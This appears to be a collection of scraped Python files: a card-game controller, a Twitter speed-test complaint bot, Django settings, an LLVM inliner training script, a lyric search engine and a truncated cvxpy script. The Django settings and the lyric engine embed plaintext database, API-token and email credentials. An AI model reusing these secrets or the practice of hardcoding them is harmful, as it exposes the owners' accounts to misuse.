card_state=initial_state)\n\n new_players = [\n PlayerState(\n player_id=player,\n game_id=game_id,\n card_state=create_initial_player_state(card_list)\n ) for player in request_data['players']\n ]\n\n session = get_new_db_session()\n session.add(new_game_info)\n session.add(new_game)\n\n for player in new_players:\n session.add(player)\n\n try:\n session.commit()\n logger.debug(\n 'successfully created new game state for game id {}'.format(\n game_id\n )\n )\n return status.HTTP_200_OK\n except SQLAlchemyError:\n logger.error(\n 'SQLAlchemyError while attempting game state creation for game id {}'.format(\n game_id\n )\n )\n return status.HTTP_500_INTERNAL_SERVER_ERROR\n\n finally:\n session.close()\n","sub_path":"card_broker/controllers/new_game.py","file_name":"new_game.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"488223194","text":"import os\nimport sys\nimport tweepy\nimport json\nimport twitter\nimport signal\nimport time\nimport speedtest\n\ndef main():\n\n \n print(\" ____ __ __ ____ ____ ______________ \")\n print(\" / __ \\____ _ _____ ________ ____/ / / /_ __ __ / __ )/ __ \\/ _/_ __/ __ \\ \")\n print(\" / /_/ / __ \\ | /| / / _ \\/ ___/ _ \\/ __ / / __ \\/ / / / / __ / /_/ // / / / / / / / \")\n print(\" / ____/ /_/ / |/ |/ / __/ / / __/ /_/ / / /_/ / /_/ / / /_/ / _, _// / / / / /_/ / \")\n print(\"/_/ 
\\____/|__/|__/\\___/_/ \\___/\\__,_/ /_.___/\\__, / /_____/_/ |_/___/ /_/ \\____/ \")\n print(\" /____/ \")\n Detente = True\n while(Detente):\n try:\n print(\"--ANALIZANDO RED--\")\n c = WacharRed()\n time.sleep(5)\n except:\n print(\"--PROGRAMA FINALIZADO--\")\n Detente = False\n\n \n\n\nclass AccionesTwitter():\n\n def __init__(self):\n self.keysValidacion() \n\n def keysValidacion(self):\n \n file = open('config.json')\n jsond = json.load(file)\n\n consumerkey = jsond['validation']['twConsumerKey']\n consumersecret = jsond['validation']['twConsumerKeySecret']\n accesstoken = jsond['validation']['twAccessToken']\n accesssecret = jsond['validation']['twAccessTokenSecret']\n\n self.conexionApi(consumerkey, consumersecret, accesstoken, accesssecret)\n\n def conexionApi (self, ck, cks, at, ats):\n\n auth = tweepy.OAuthHandler(ck, cks)\n auth.set_access_token(at, ats)\n api = tweepy.API(auth)\n self.enviarTweet(api)\n\n def fraseTweet(self):\n \n print(\"eo\")\n \n def enviarTweet(self,api):\n \n api.update_status(\"fuctsx\")\n\n\nclass WacharRed():\n def __init__(self):\n self.run()\n\n\n def run(self):\n \n \n tests = os.popen(\"\\\\Users\\\\Carlos\\\\Environments\\\\project1\\\\Scripts\\\\speedtest-cli --simple\").read()\n \n resultSet = tests.split('\\n')\n ping = resultSet[0]\n download = resultSet[1]\n upload = resultSet[2]\n\n print(ping)\n print(download)\n print(upload)\n\n ping = float(ping.replace('Ping: ', '').replace(' ms', ''))\n download = float(download.replace('Download: ', '').replace(' Mbit/s', ''))\n upload = float(upload.replace('Upload: ', '').replace(' Mbit/s', ''))\n\n if (download<30):\n print(\"Que verga Telmex dame mi puto internet\")\n \n\n \n \n\n\n\n \n\n\n\nif __name__=='__main__':\n main()\n ","sub_path":"queja.py","file_name":"queja.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"402304350","text":"# -*- coding: utf-8 -*-\n\nfrom .base import *\n\n\nDEBUG = True\nDEBUG_TOOLBAR_PATCH_SETTINGS = False\n\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'HOST': '223.202.202.48',\n 'PORT': '3306',\n 'NAME': 'fuse_nova_pro',\n 'USER': 'rLukerUser',\n 'PASSWORD': 'CsP_9r0up',\n 'OPTIONS': {\n 'init_command': \"SET sql_mode='STRICT_TRANS_TABLES'\",\n },\n }\n}\n\nDJANGO_SETTINGS_MODULE_SELF = \"fuse_nova.settings.admin_settings_dev\"\n\n# SSO_NAME = 'nova-console'\nSSO_NAME = 'nova-test'\n\n# API_URL = \"223.202.202.38:8800\"\n\nAPI_URL = \"127.0.0.1:8800\"\nLOGIN_URL = '/base/admin_login/'\n\n# '*' is fine for local testing, but set explicit domains in production\nALLOWED_HOSTS = [\n '*',\n]","sub_path":"fuse_nova/settings/admin_settings_pro.py","file_name":"admin_settings_pro.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"371796982","text":"# coding=utf-8\n# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nr\"\"\"Train and Eval LLVM Inliner decision rule 
with local_data_collector.\"\"\"\n\nimport functools\nimport os\n\nfrom absl import app\nfrom absl import flags\nfrom absl import logging\nimport gin\nfrom tf_agents.system import system_multiprocessing as multiprocessing\n\nfrom compiler_opt.rl import agent_creators\nfrom compiler_opt.rl import config\nfrom compiler_opt.rl import data_reader\nfrom compiler_opt.rl import gin_external_configurables # pylint: disable=unused-import\nfrom compiler_opt.rl import inlining_runner\nfrom compiler_opt.rl import local_data_collector\nfrom compiler_opt.rl import policy_saver\nfrom compiler_opt.rl import random_net_distillation\nfrom compiler_opt.rl import trainer\n\nflags.DEFINE_string('root_dir', os.getenv('TEST_UNDECLARED_OUTPUTS_DIR'),\n 'Root directory for writing logs/summaries/checkpoints.')\nflags.DEFINE_string('data_path', None,\n 'Path to CNS folder containing IR files.')\nflags.DEFINE_string('clang_path', 'clang', 'Path to clang binary.')\nflags.DEFINE_string('llvm_size_path', 'llvm-size', 'Path to llvm_size binary.')\nflags.DEFINE_string('launcher_path', None, 'Path to launcher binary.')\nflags.DEFINE_integer(\n 'num_workers', None,\n 'Number of parallel data collection workers. `None` for max available')\nflags.DEFINE_integer('num_modules', 100,\n 'Number of modules to collect data for each iteration.')\nflags.DEFINE_multi_string('gin_files', [],\n 'List of paths to gin configuration files.')\nflags.DEFINE_multi_string(\n 'gin_bindings', [],\n 'Gin bindings to override the values set in the config files.')\n\nFLAGS = flags.FLAGS\n\n\n@gin.configurable\ndef train_eval(agent_name='ppo',\n problem_type=None,\n warmstart_policy_dir=None,\n num_policy_iterations=0,\n num_iterations=100,\n batch_size=64,\n train_sequence_length=1,\n deploy_policy_name='saved_policy',\n use_random_network_distillation=False,\n use_stale_results=False):\n \"\"\"Train for LLVM inliner.\"\"\"\n root_dir = FLAGS.root_dir\n\n time_step_spec, action_spec = config.get_signature_spec(\n problem_type)\n preprocessing_layer_creator = config.get_preprocessing_layer_creator(\n problem_type)\n\n # Initialize trainer and policy saver.\n tf_agent = agent_creators.create_agent(agent_name, time_step_spec,\n action_spec,\n preprocessing_layer_creator)\n # create the random network distillation object\n random_network_distillation = None\n if use_random_network_distillation:\n random_network_distillation = (\n random_net_distillation.RandomNetworkDistillation(\n time_step_spec=time_step_spec,\n preprocessing_layer_creator=preprocessing_layer_creator))\n\n llvm_trainer = trainer.Trainer(\n root_dir=root_dir,\n agent=tf_agent,\n random_network_distillation=random_network_distillation,\n warmstart_policy_dir=warmstart_policy_dir)\n\n policy_dict = {\n 'saved_policy': tf_agent.policy,\n 'saved_collect_policy': tf_agent.collect_policy,\n }\n saver = policy_saver.PolicySaver(policy_dict=policy_dict)\n\n with open(os.path.join(FLAGS.data_path, 'module_paths'), 'r') as f:\n module_paths = [\n os.path.join(FLAGS.data_path, name.rstrip('\\n')) for name in f\n ]\n file_paths = [(path + '.bc', path + '.cmd') for path in module_paths]\n\n runner = inlining_runner.InliningRunner(\n clang_path=FLAGS.clang_path, llvm_size_path=FLAGS.llvm_size_path,\n launcher_path=FLAGS.launcher_path)\n\n dataset_fn = data_reader.create_sequence_example_dataset_fn(\n agent_name=agent_name,\n time_step_spec=time_step_spec,\n action_spec=action_spec,\n batch_size=batch_size,\n train_sequence_length=train_sequence_length)\n\n sequence_example_iterator_fn = (\n lambda 
seq_ex: iter(dataset_fn(seq_ex).repeat()))\n\n data_collector = local_data_collector.LocalDataCollector(\n file_paths=file_paths,\n num_workers=FLAGS.num_workers,\n num_modules=FLAGS.num_modules,\n runner=runner.collect_data,\n parser=sequence_example_iterator_fn,\n use_stale_results=use_stale_results)\n\n # Repeat for num_policy_iterations iterations.\n while (llvm_trainer.global_step_numpy() <\n num_policy_iterations * num_iterations):\n policy_path = os.path.join(root_dir, 'policy',\n str(llvm_trainer.global_step_numpy()))\n saver.save(policy_path)\n\n dataset_iter, monitor_dict = data_collector.collect_data(\n policy_path=os.path.join(policy_path, deploy_policy_name))\n llvm_trainer.train(dataset_iter, monitor_dict, num_iterations)\n\n data_collector.on_dataset_consumed(dataset_iter)\n\n # Save final policy.\n saver.save(root_dir)\n # Wait for all the workers to finish.\n data_collector.close_pool()\n\n\ndef main(_):\n gin.parse_config_files_and_bindings(\n FLAGS.gin_files, bindings=FLAGS.gin_bindings, skip_unknown=False)\n logging.info(gin.config_str())\n\n train_eval()\n\n\nif __name__ == '__main__':\n flags.mark_flag_as_required('data_path')\n multiprocessing.handle_main(functools.partial(app.run, main))\n","sub_path":"compiler_opt/rl/train_locally.py","file_name":"train_locally.py","file_ext":"py","file_size_in_byte":5825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"109764518","text":"\n# coding: utf-8\n\n# ### Get Top100 songs\n\n# In[1]:\n\n\ndef get_top100_list():\n output_list = list()\n url = \"https://www.billboard.com/charts/hot-100\"\n\n import requests\n from bs4 import BeautifulSoup\n \n try:\n response = requests.get(url) \n if not response.status_code == 200:\n print(\"HTTP error\",response.status_code)\n else:\n try:\n soup = BeautifulSoup(response.content,'lxml')\n except:\n print('something went wrong')\n except:\n print(\"Something went wrong with request.get\")\n \n top1_name = soup.find('div',class_='chart-number-one__title').get_text()\n top1_artist = soup.find('div',class_='chart-number-one__artist').get_text()\n output_list.append((top1_name,top1_artist))\n \n all_songs = soup.find_all('div',class_='chart-list-item__text')\n \n for song in all_songs:\n song_name = song.find('span',class_='chart-list-item__title-text').get_text()\n artist = song.find('div',class_='chart-list-item__artist').get_text()\n output_list.append((song_name,artist))\n \n return output_list\n\n\n# In[2]:\n\n\ndef get_all_info(list_of_songs):\n import requests\n import re\n from bs4 import BeautifulSoup\n all_song_info = []\n for song in list_of_songs:\n name = song[0].strip()\n pattern = r'[^()]+'\n match = re.search(pattern,name)\n name = match.group().strip()\n artist = song[1].strip()\n search_artist = artist.lower().replace(' x ',' & ')\n if ' featuring' in search_artist:\n pattern_artist = r' featuring'\n search_artist = search_artist.lower()[:re.search(pattern_artist,search_artist.lower()).span()[0]]\n token = 'agZ_VYrkzow8Wo80yQSUpgi0V9J9szWwtLF4cY9inzE-jIoOe3xrs43F9yYB28Xg'\n base_url = 'https://api.genius.com'\n headers = {'Authorization': 'Bearer ' + token}\n search_url = base_url + '/search'\n data = {'q': name + ' ' + search_artist}\n \n try:\n response = requests.get(search_url, data=data, headers=headers)\n if not response.status_code == 200:\n print(\"HTTP error\",response.status_code)\n else:\n try:\n lyric_path = 'http://genius.com'+response.json()['response']['hits'][0]['result']['path']\n except:\n print('Error 
while searching for the song.')\n continue\n except:\n print(\"Something went wrong with request.get\")\n continue\n\n try:\n response2 = requests.get(lyric_path)\n if not response2.status_code == 200:\n print(\"HTTP error\",response2.status_code)\n else:\n try:\n response2_page = BeautifulSoup(response2.content,'lxml')\n except:\n print('Error happens while searching for lyrics.')\n continue\n except:\n print(\"Something went wrong with request.get\")\n continue\n# list_=response2_page.find('div',class_='lyrics').find_all('a',class_='referent')\n# lyrics = ''\n# for item in list_:\n# line = item.get_text()\n# lyrics += line + ' '\n# lyrics = lyrics.replace('\\n', ' ')\n# print(lyric_path)\n try:\n lyrics = response2_page.find('div',class_='lyrics').get_text().replace('\\n',' ').strip()\n except:\n continue\n all_song_info.append((name,artist,lyrics))\n return all_song_info\n\n\n# ### Get albums information\n\n# In[3]:\n\n\ndef album_info(artist):\n import requests\n import re\n from bs4 import BeautifulSoup\n result = dict()\n token = 'agZ_VYrkzow8Wo80yQSUpgi0V9J9szWwtLF4cY9inzE-jIoOe3xrs43F9yYB28Xg'\n base_url = 'https://api.genius.com'\n headers = {'Authorization': 'Bearer ' + token}\n search_url = base_url + '/search'\n data = {'q':artist}\n \n try:\n response = requests.get(search_url, data=data, headers=headers)\n if not response.status_code == 200:\n print(\"HTTP error\",response.status_code)\n else:\n try:\n url_artist = response.json()['response']['hits'][0]['result']['primary_artist']['url']\n except:\n print('Error happens. Cannot find albums information of %s.'%artist)\n return []\n except:\n print('Something went wrong with request.get')\n return []\n try:\n response2 = requests.get(url_artist)\n if not response2.status_code == 200:\n print(\"HTTP error\",response2.status_code)\n else:\n try:\n response2_page = BeautifulSoup(response2.content,'lxml')\n except:\n print('Error happens. 
Cannot find albums information of %s.'%artist)\n return []\n except:\n print('Something went wrong with request.get')\n return []\n string1 = str(response2_page)\n pattern1 = r'https://genius.com/albums/[0-9A-Za-z-/]*'\n urls_album = re.findall(pattern1,string1)\n urls_album = set(urls_album)\n if len(urls_album) == 0:\n print('Cannot find albums information of %s.'%artist)\n return []\n for url_a in urls_album:\n try:\n response3 = requests.get(url_a)\n if not response3.status_code == 200:\n print(\"HTTP error\",response3.status_code)\n else:\n try:\n response3_page = BeautifulSoup(response3.content,'lxml')\n except:\n print('Error happens.')\n continue\n except:\n print(\"Something went wrong with request.get\")\n continue\n try:\n name = response3_page.find('h1').get_text()\n except:\n print('Error happens in finding the album name.')\n name = 'unknown'\n continue\n if response3_page.find_all('div',class_='metadata_unit') != []:\n date = response3_page.find_all('div',class_='metadata_unit')[0].get_text()[9:]\n else:\n date = 'NA'\n songs = list()\n list_of_songs = response3_page.find_all('h3',class_='chart_row-content-title')\n for song in list_of_songs:\n pattern2 = r'[^\\n]+'\n string2 = song.get_text().strip()\n song_name = re.search(pattern2,string2).group()\n song_name = song_name[re.search(r'[^\\w]*',song_name).span()[1]:]\n songs.append(song_name.replace('\\xa0',' '))\n album_info = (date,songs)\n result[name] = album_info\n return result\n\n\n# ### search songs\n\n# In[4]:\n\n\ndef get_song_lyrics(top100_list): # top100_list contain (song_name,artist,lyrics)\n i=0\n song_lyrics_dict = dict()\n while i < len(top100_list):\n song_name = top100_list[i][0].strip()\n lyrics = top100_list[i][2].strip()\n song_lyrics_dict[song_name]= lyrics\n i = i+1\n return song_lyrics_dict # (song_name,lyrics)\n\n\n# In[5]:\n\n\ndef find_song(song_lyrics_dict,search_list): # song_lyrics_dict\n \n import re\n from nltk import word_tokenize\n \n song_name= []\n result_dict=dict()\n for key in song_lyrics_dict.keys():\n result_dict[key] = 1\n \n for sword in search_list:\n sword = sword.lower()\n for key,value in song_lyrics_dict.items():\n lyrics=value.replace(',','').lower()\n lyrics_list = word_tokenize(lyrics)\n if sword not in lyrics_list:\n result_dict[key]= 0\n \n for key, value in result_dict.items():\n if value:\n song_name.append(key)\n return song_name\n\n\n# ### song recommendation(similarity analysis)\n\n# In[6]:\n\n\ndef similar_song(song_name,lyric_list,lyric_dict):\n from gensim import corpora\n from gensim.parsing.preprocessing import STOPWORDS\n from gensim.similarities.docsim import Similarity\n from gensim import corpora, models, similarities\n\n # texts = [[word for word in doc.lower().split()\n # if word not in STOPWORDS and word.isalnum()]\n # for doc in reference_docs]\n\n all_song_info = lyric_list\n \n texts = [[word for word in song[2].lower().split()\n if word not in STOPWORDS and word.isalnum()]\n for song in all_song_info]\n\n dictionary = corpora.Dictionary(texts)\n corpus = [dictionary.doc2bow(text) for text in texts]\n\n lsi = models.LsiModel(corpus, id2word=dictionary, num_topics=5)\n lyrics = lyric_dict[song_name]\n vec_bow = dictionary.doc2bow(lyrics.lower().split())\n vec_lsi = lsi[vec_bow]\n lsi_index = similarities.MatrixSimilarity(lsi[corpus])\n sims = lsi_index[vec_lsi]\n sims = sorted(enumerate(sims), key=lambda item: -item[1])\n\n most_similar_song_num = sims[1][0]\n most_similar_song = all_song_info[most_similar_song_num]\n return most_similar_song\n\n\n# ### 
sentiment analysis\n\n# In[7]:\n\n\ndef get_nrc_data():\n nrc = \"NRC-emotion-lexicon-wordlevel-alphabetized-v0.92.txt\"\n count=0\n emotion_dict=dict()\n with open(nrc,'r') as f:\n all_lines = list()\n for line in f:\n if count < 46:\n count+=1\n continue\n line = line.strip().split('\\t')\n if int(line[2]) == 1:\n if emotion_dict.get(line[0]):\n emotion_dict[line[0]].append(line[1])\n else:\n emotion_dict[line[0]] = [line[1]]\n return emotion_dict\n\n\n# In[8]:\n\n\ndef emotion_analyzer(text,emotion_dict):\n #Set up the result dictionary\n emotions = {x for y in emotion_dict.values() for x in y} \n emotion_count = dict() \n for emotion in emotions:\n emotion_count[emotion] = 0\n\n #Analyze the text and normalize by total number of words\n total_words = len(text.split())\n for word in text.split():\n if emotion_dict.get(word): \n for emotion in emotion_dict.get(word):\n emotion_count[emotion] += 1/len(text.split())\n return emotion_count\n\n\n# In[9]:\n\n\ndef emotion_analyzer_and_recommend(song_name,text,dict_,lyric_list,lyric_dict):\n \n for key,value in lyric_dict.items():\n if key == song_name:\n text = value \n result = emotion_analyzer(text,dict_)\n emotions = {'fear': result['fear'], 'joy': result['joy'], 'anticipation': result['anticipation'],'sadness': result['sadness']}\n emotion = 'This is a song of '+ sorted(emotions,key=lambda x:emotions[x])[-1]\n similar = 'A similar song we recommend: ' + similar_song(song_name,lyric_list,lyric_dict)[0]\n print(emotion,'\\n',similar)\n return None\n\n\n# ## Song Info\n\n# #### Find the mv or a relevant trending video\n\n# In[10]:\n\n\ndef get_mv(song_name, singer):\n from bs4 import BeautifulSoup as bs\n import requests\n base = \"https://www.youtube.com/results?search_query=\"\n\n try:\n response = requests.get(base+song_name+singer)\n if not response.status_code == 200:\n print(\"HTTP error\",response.status_code)\n else:\n page = response.text\n soup = bs(page,'html.parser')\n except:\n print('Cannot parse using BeautifulSoup.')\n return None\n vids = soup.findAll('a',attrs={'class':'yt-uix-tile-link'})\n if len(vids) != 0:\n mv = vids[0]\n if 'http' in mv['href']:\n mv = vids[1]\n mv_link = 'https://www.youtube.com' + mv['href']\n\n else:\n mv_link = 'NO MV FOUND'\n print(mv_link)\n if mv_link != 'NO MV FOUND':\n while True:\n whether = str(input('Do you want to watch its MV or the trending relevant video on Youtube right now? [y/n] '))\n if whether.lower() == 'y' or whether.lower() == 'n':\n break\n else:\n print('Wrong input! 
Try again.')\n if whether.lower() == 'y':\n import webbrowser\n webbrowser.open(mv_link, new=0, autoraise=True)\n else:\n print()\n print('Here is the link to the mv for you to enjoy later: ' + mv_link)\n print()\n return None\n\n \n\n\n# #### Concert info\n\n# In[11]:\n\n\ndef get_concert(singer,city = None):\n try:\n import requests\n from bs4 import BeautifulSoup as bs \n base = \"https://www.songkick.com/search?utf8=✓&type=initial&query=\"\n qstring = singer\n try:\n r = requests.get(base+qstring)\n if not r.status_code == 200:\n print(\"HTTP error\",r.status_code)\n else:\n page = r.text\n soup = bs(page,'lxml')\n except:\n print('Cannot parse using BeautifulSoup.')\n return None\n vids = soup.findAll('a',attrs={'class':'yt-uix-tile-link'})\n events = soup.findAll('li',attrs={'class':'artist'})\n artist = events[0].findAll('a')[1]\n artist_link = \"https://www.songkick.com\" + artist['href']\n r = requests.get(artist_link)\n page = r.text\n soup=bs(page,'lxml')\n tour = soup.findAll('li',attrs={'class':'ontour'})\n on_tour = tour[0].get_text()\n if on_tour[-2:] == 'no':\n print('Sorry, %s is not on tour.' % singer)\n return None\n else:\n upcoming = soup.findAll('p', class_ = 'see-all')\n upcoming_link = \"https://www.songkick.com\" + upcoming[0].find('a')['href']\n try:\n r = requests.get(upcoming_link)\n if not r.status_code == 200:\n print(\"HTTP error\",r.status_code)\n else:\n page = r.text\n soup = bs(page,'html.parser')\n except:\n print('Cannot parse using BeautifulSoup.')\n return None\n events = soup.find('ul',class_=\"event-listings artist-focus\")\n concert_list = list()\n concert_list = get_venue_and_time(events)\n if len(concert_list) == 0:\n print('Sorry, %s is not on tour.' % singer)\n return None\n print()\n whether = str(input('Do you want to see info for all concerts? [y/n] '))\n if whether.lower() == 'y':\n print()\n for concert in concert_list:\n print(concert[:(concert.find('; Link to ticket'))])\n print()\n if city is None:\n return None\n print()\n whether_city = str(input('Do you want to check if a concert will be held in the city you want? [y/n] '))\n if whether_city.lower() == 'y':\n found = check_city(city, concert_list)\n if found is not None:\n print()\n whether_ticket = str(input('Do you want to buy the tickets? 
[y/n] '))\n if whether_ticket and whether_ticket.lower() == 'y':\n try:\n ticket_link(found,singer)\n except:\n pass\n return None\n except:\n print('No concert info available on songkick.com.')\n print()\n return None\n \n\n\n# In[12]:\n\n\ndef get_venue_and_time(events):\n concert_list = list()\n results = events.find_all('li')\n for i in range(len(results)):\n if results[i].attrs.get('class') == ['with-date']:\n when = results[i].get_text().replace('\\n','')\n locations = results[i+1].find('p',class_ = 'location')\n try:\n ticket = 'https://www.songkick.com' + results[i+1].find('span',class_=\"button buy-tickets\").parent.get('href')\n except:\n ticket = 'Sorry, ticket is not on sale yet.'\n venue = locations.find_all('span')[0]\n city = locations.find_all('span')[1]\n where = \" \".join(venue.get_text().replace('\\n','').split()) + ', '+ \" \".join(city.get_text().replace('\\n','').split())\n concert_list.append('Time: %s; Location: %s; Link to ticket: %s' % (when, where, ticket))\n return concert_list\n\n\n# In[13]:\n\n\ndef check_city(city, list_):\n import re\n found = list()\n for i in range(len(list_)):\n if city.lower() in list_[i].lower():\n found.append(list_[i])\n if len(found) > 0:\n print()\n print('Great new, concerts will be held in the city you want!')\n print()\n for concert in found:\n print(concert[:(concert.find('; Link to ticket'))])\n print()\n return found\n else:\n print()\n print('Sorry, no concert will be held in the city you want. Stay tuned!')\n print()\n return None\n \n \n \n\n\n# In[14]:\n\n\ndef ticket_link(found_list,singer):\n ticket_list = list()\n contains_http = False\n for concert in found_list:\n info = concert[:(concert.find('; Link to ticket'))]\n ticket = concert[(concert.find('; Link to ticket'))+1:]\n if 'http' in ticket:\n contains_http = True\n print()\n print(info)\n print()\n print(ticket)\n print()\n ticket_list.append((info,ticket))\n \n if contains_http == True:\n done = False\n while True:\n selection = input('Do you want me to send you a reminder email? [y/n] ')\n if selection.lower() == 'y' or selection.lower() == 'n':\n break\n else:\n print('Wrong input! Try again.')\n if selection.lower() == 'y':\n account = str(input(\"Please enter your email account as a string(e.g. 'instance@example.com'): \"))\n elif selection.lower() == 'n':\n print()\n print('See ya!')\n print()\n else:\n print('Wrong input!')\n print()\n if account:\n try:\n import smtplib \n \n fromMy = 'antonio_ye@yahoo.com' \n to = str(account)\n subj='Gotta buy those tickets!'\n date='11/29/2018'\n for info in ticket_list:\n text = info[0] + '\\n' + info[1] + '\\n\\n'\n message_text='Here is the ticket info for the concerts of %s in your city:\\n\\n' % str(singer) + text + 'Your Tools for Analytics Students'\n\n msg = \"From: %s\\nTo: %s\\nSubject: %s\\nDate: %s\\n\\n%s\" % ( fromMy, to, subj, date, message_text )\n username = str('antonio_ye@yahoo.com') \n password = str('NRBDkTqMPvN4Aqg') \n\n server = smtplib.SMTP(\"smtp.mail.yahoo.com\",587)\n server.ehlo() \n server.starttls()\n server.login(username,password)\n server.sendmail(fromMy, to,msg)\n server.quit() \n print('Sent! Enjoy the show. Note that the email may take several minutes to arrive...')\n print()\n except:\n print('Oops! 
An error occurred.')\n print()\n \n return None\n\n\n# ## main functions\n\n# #### name seperater (if multiple singers)\n\n# In[15]:\n\n\ndef seperate_name(singer):\n singer = singer.replace(' x ',' & ').replace(' X ',' & ').replace(' Featuring ',' & ').replace(', ',' & ')\n singer = singer.split(' & ')\n if len(singer) == 1:\n return singer[0]\n else:\n for i in range(len(singer)):\n print('%s.%s' % (str(i+1),singer[i]))\n print()\n which_singer = int(input('More than one singer in this song! Please select who you want to know about: '))\n singer = singer[which_singer-1]\n return singer\n \n\n \n\n\n# #### song search main function\n\n# In[16]:\n\n\ndef find_song_based_on_search(list_of_songs,songs_with_lyrics,song_lyrics_dict,search_string=None,first_time=None):\n if not first_time:\n search_string = str(input('Please enter a lyric string: '))\n print('Searching, please be patient...')\n print()\n song_name = find_song(song_lyrics_dict,search_string.split())\n \n if len(song_name) == 1:\n the_one_name = song_name[0]\n print(the_one_name)\n for trio in songs_with_lyrics:\n if trio[0] == the_one_name:\n corresponding_artist = trio[1]\n lyric = trio[2]\n return the_one_name,corresponding_artist,lyric\n if len(song_name) > 1:\n for i in range(len(song_name)):\n print('%s.%s' % (str(i+1),song_name[i]))\n print()\n which_song = int(input('More than one song found! Hear them out and select which one you like the most (enter its number): '))\n the_one_name = song_name[which_song-1]\n for trio in songs_with_lyrics:\n if trio[0] == the_one_name:\n corresponding_artist = trio[1]\n lyric = trio[2]\n return the_one_name,corresponding_artist,lyric\n elif len(song_name) == 0:\n print('Sorry, based on our search, your search does not match any records of the recent trending songs...')\n print()\n return None,None,None\n\n\n# #### main menu\n\n# In[17]:\n\n\ndef get_info_main_menu(song,name,lyric,lyric_list,lyric_dict):\n done = False\n while done is not True:\n print('--------------------------------------------')\n print('1.Watch its MV or a trending relevent video')\n print('2.Check concert info')\n print('3.See albums of this singer')\n print('4.Find a similar song')\n print('5.Quit')\n print()\n selection = str(input('Please make a choice: ')).replace('.','')\n if selection == '1':\n get_mv(song, name)\n while True:\n main_menu = str(input('Would you like to go back to main menu? [y/n] '))\n if main_menu.lower() == 'y' or main_menu.lower() == 'n':\n break\n else:\n print('Wrong input! Try again.')\n if main_menu.lower() == 'n':\n done = True\n elif selection == '2':\n singer = seperate_name(name)\n whether_city = str(input('Do you want to find out about a specific city? [y/n] '))\n if whether_city == 'y':\n city_name = str(input('Please enter a city name: '))\n get_concert(singer,city = city_name)\n else:\n get_concert(singer,city = None)\n while True:\n main_menu = str(input('Would you like to go back to main menu? [y/n] '))\n if main_menu.lower() == 'y' or main_menu.lower() == 'n':\n break\n else:\n print('Wrong input! Try again.')\n if main_menu.lower() == 'n':\n done = True\n elif selection == '3':\n singer = seperate_name(name)\n albums = album_info(singer) \n if len(albums) > 0:\n print()\n print('Previous album(s) of this singer (album name : release date, [songs in this album]): ')\n print(albums)\n print()\n else:\n print('Somehow this singer does not have any album...')\n print()\n while True:\n main_menu = str(input('Would you like to go back to main menu? 
[y/n] '))\n if main_menu.lower() == 'y' or main_menu.lower() == 'n':\n break\n else:\n print('Wrong input! Try again.')\n if main_menu.lower() == 'n':\n done = True\n elif selection == '4':\n emotion_dict = get_nrc_data()\n emotion_analyzer_and_recommend(song,lyric,emotion_dict,lyric_list,lyric_dict)\n while True:\n main_menu = str(input('Would you like to go back to main menu? [y/n] '))\n if main_menu.lower() == 'y' or main_menu.lower() == 'n':\n break\n else:\n print('Wrong input! Try again.')\n if main_menu.lower() == 'n':\n done = True\n elif selection == '5':\n done = True\n else:\n print('Wrong number. Try again.')\n print()\n print() \n return None\n\n\n# #### run them all\n\n# In[18]:\n\n\ndef run_all():\n # for the first time searching\n while True:\n try:\n search_string = str(input('Please enter a lyric string: '))\n print('Searching for the first time. May take around 1 minute, please be patient...')\n print()\n list_of_songs = get_top100_list()\n songs_with_lyrics = get_all_info(list_of_songs)\n song_lyrics_dict = get_song_lyrics(songs_with_lyrics)\n song, singer, lyric = find_song_based_on_search(list_of_songs, songs_with_lyrics, song_lyrics_dict,\n search_string, first_time=True)\n if song:\n get_info_main_menu(song, singer, lyric, songs_with_lyrics, song_lyrics_dict)\n while True:\n answer = str(input('Do you want to search for another lyric string? [y/n] '))\n if answer.lower() == 'y' or answer.lower() == 'n':\n break\n else:\n print('Wrong input! Try again.')\n print()\n if answer == 'n':\n print()\n print('Bye-bye.')\n print()\n return None\n break\n except:\n print('Please try again.')\n print()\n\n # for searching after the first\n while True:\n try:\n while True:\n song, singer, lyric = find_song_based_on_search(list_of_songs, songs_with_lyrics, song_lyrics_dict)\n if song:\n get_info_main_menu(song, singer, lyric, songs_with_lyrics, song_lyrics_dict)\n while True:\n answer = str(input('Do you want to search for another lyric string? [y/n] '))\n if answer.lower() == 'y' or answer.lower() == 'n':\n break\n else:\n print('Wrong input! 
Try again.')\n print()\n if answer == 'n':\n print()\n print('Bye-bye.')\n print()\n return None\n except:\n print('Please try again.')\n print()\n return None\n\n\n# In[19]:\n\n\nrun_all()\n\n","sub_path":"lyric_search_engine.py","file_name":"lyric_search_engine.py","file_ext":"py","file_size_in_byte":26306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"531688144","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom UOT import *\nimport pdb\nimport cvxpy as cp\n\nnp.random.seed(9999)\n\nnr = 100\nnc = 100\neta = 1\ntau = 5\nC = np.random.uniform(low=1, high=10, size=(nr, nc))\nC = (C + C.T) / 2\nr = np.random.uniform(low=0.1, high=1, size=(nr, 1))\nc = np.random.uniform(low=0.1, high=1, size=(nc, 1))\n\ndef solve_g_dual_cp(C, a, b, eta, tau):\n u = cp.Variable(shape=a.shape)\n v = cp.Variable(shape=b.shape)\n\n u_stack = cp.vstack([u.T for _ in range(nr)])\n v_stack = cp.hstack([v for _ in range(nc)])\n print(u_stack.shape, v_stack.shape)\n\n # obj = eta * cp.sum(cp.multiply(cp.exp(u + v.T) * cp.exp(v).T, 1 / cp.exp(C)))\n # obj = eta * cp.sum(cp.multiply(cp.exp(u_stack + 